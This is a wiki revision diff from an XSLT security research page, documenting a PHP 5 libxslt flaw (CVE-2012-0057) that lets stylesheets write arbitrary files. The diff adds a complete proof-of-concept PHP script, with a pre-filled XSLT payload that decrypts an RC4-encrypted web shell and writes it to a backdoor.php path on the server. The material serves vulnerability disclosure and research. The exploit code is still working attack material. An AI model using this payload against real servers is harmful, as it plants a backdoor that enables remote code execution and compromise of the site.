Changes for page Application_PHP5
Last modified by Nicolas Gregoire on 2012/02/02 17:29
From version 
15.1 
15.1
edited by Nicolas Gregoire
on 2012/01/16 11:37
on 2012/01/16 11:37
Change comment:
There is no comment for this version
To version 18.1
18.1
edited by Nicolas Gregoire
on 2012/01/18 22:39
on 2012/01/18 22:39
Change comment:
There is no comment for this version
Summary
Details
-
Page properties
-
- Content
-
... ... @@ -6,7 +6,7 @@ 6 6 7 7 = Creating files = 8 8 9 -Version 5 of the PHP language uses the [[libxslt>>Engine_libxslt]] engine to transform XML documents using XSLT. Prior to version 5.3.9, calls to libxslt were not restricted via xsltSetSecurityPrefs(). It was then possible to create or overwrite files on the engine side, typically for dropping a PHP Web Shell. This vulnerability ([[Bug #54446>>https://bugs.php.net/bug.php?id=54446||rel="__blank"]]) was patched in version 5.3.9 ([[ChangeLog>>http://php.net/ChangeLog-5.php#5.3.9||rel="__blank"]]). 9 +Version 5 of the PHP language uses the [[libxslt>>Engine_libxslt]] engine to transform XML documents using XSLT. Prior to version 5.3.9, calls to libxslt were not restricted via xsltSetSecurityPrefs(). It was then possible to create or overwrite files on the engine side, typically for dropping a PHP Web Shell. This vulnerability ([[Bug #54446>>https://bugs.php.net/bug.php?id=54446||rel="__blank"]] / ([[CVE-2012-0057>>http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0057||rel="__blank" title="CVE-2012-0057"]]) was patched in version 5.3.9 ([[ChangeLog>>http://php.net/ChangeLog-5.php#5.3.9||rel="__blank"]]). 10 10 11 11 == Simple PoC == 12 12 ... ... @@ -14,7 +14,7 @@ 14 14 15 15 == PoC with crypto == 16 16 17 -A better script was later posted on [[OSS-Security>>http://seclists.org/oss-sec/2012/q1/157]] at RedHat request. This PHP script will by default display a pre-filled HTML form including XML data, XSLT code and RC4-encrypted malicious PHP code. When the form is submitted, the user-controlled XML data is transformed using the user-controlled XSLT code. Then, the output of this transformation is displayed in the browser. Meanwhile, the malicious PHP code is decrypted using a static key ("simple_demo") and saved to "/var/www/xxx/backdoor.php". 17 +A better script was later posted on [[OSS-Security>>http://seclists.org/oss-sec/2012/q1/157]] at RedHat request. This PHP script ([[attach:php539-xslt.php]]) will by default display a pre-filled HTML form including XML data, XSLT code and RC4-encrypted malicious PHP code. When the form is submitted, the user-controlled XML data is transformed using the user-controlled XSLT code. Then, the output of this transformation is displayed in the browser. Meanwhile, the malicious PHP code is decrypted using a static key ("simple_demo") and saved to "/var/www/xxx/backdoor.php". 18 18 19 19 = Executing PHP code = 20 20
-
php539-xslt.php
-
- Author
-
... ... @@ -1,0 +1,1 @@ 1 +xwiki:XWiki.NicolasGregoire - Size
-
... ... @@ -1,0 +1,1 @@ 1 +2.0 KB - Content
-
... ... @@ -1,0 +1,68 @@ 1 + 2 +<?php 3 + 4 +// Get parameters 5 +$action = $_POST['action']; 6 +$xml = $_POST['xml']; 7 +$xsl = $_POST['xsl']; 8 + 9 +print "<html><body>"; 10 +if ($action == "transform") { 11 + 12 + print "<h2>Ready to transform ...</h2><br/>"; 13 + 14 + # LOAD XML FILE 15 + $xmldom = new DOMDocument(); 16 + print "XML: <pre>".htmlentities($xml)."</pre><br/>"; 17 + $xmldom->loadXML($xml); 18 + 19 + # LOAD XSLT FILE 20 + $xsldom = new DOMDocument(); 21 + print "XSL: <pre>".htmlentities($xsl)."</pre><br/>"; 22 + $xsldom->loadXML($xsl); // Content of $xXsl may be untrusted ! 23 + 24 + # START XSLT 25 + $xslproc = new XSLTProcessor(); 26 + $xslproc->importStylesheet($xsldom); 27 + 28 + # TRANSFORM & PRINT 29 + $output = $xslproc->transformToXML($xmldom); // File creation ! 30 + print "Output: <pre>".htmlentities($output)."</pre><br/>"; 31 + 32 +} else { 33 + 34 + # DISPLAY A PRE-FILLED FORM 35 + print "<h1>Hello!</h1><h2>You just have to click on submit() ...</h2>"; 36 + print "Consider modifying the output path (<i>/var/www/xxx/backdoor.php</i>) in the XSL<br/><br/>"; 37 + print "<form method='post'>"; 38 + print "XML document:<br/>"; 39 + print "<textarea name='xml' rows='3' cols='130'><foobar/></textarea><br/><br/>"; 40 + print "XSLT code:<br/>"; 41 + print "<textarea name='xsl' rows='20' cols='130'>"; 42 +print <<<XSLT 43 +<xsl:stylesheet 44 + version="1.0" 45 + xmlns:xsl="http://www.w3.org/1999/XSL/Transform" 46 + xmlns:cry="http://exslt.org/crypto" 47 + xmlns:sax="http://icl.com/saxon" 48 + extension-element-prefixes="cry sax"> 49 + 50 + <xsl:template match="/"> 51 + <sax:output href="/var/www/xxx/backdoor.php" method="text"> 52 + <xsl:value-of select="cry:rc4_decrypt('simple_demo', '0262ee34196ae2df1ab850c1705ee0c38dc6ae42bbeecf140dea99675fb35539a4dcbeaf5c2e6a6cae679843dbf3650275a6be07464047dc17eff2661b8f065f0ae3abcd3b33e9fd3c48a36f2201ae65e093fa45b0a1b55cd408ec815a8dada050b8881b99e957704dc5f17208d105966680a26f')"/> 53 + </sax:output> 54 + <xsl:text>A webshell have been dropped</xsl:text> 55 + </xsl:template> 56 + 57 +</xsl:stylesheet> 58 +XSLT; 59 + print "</textarea><br/><br/>"; 60 + print "<input type='hidden' name='action' value='transform'/>"; 61 + print "<input type='submit'/></form>"; 62 + 63 +} 64 +print "</body></html>"; 65 + 66 +?> 67 + 68 +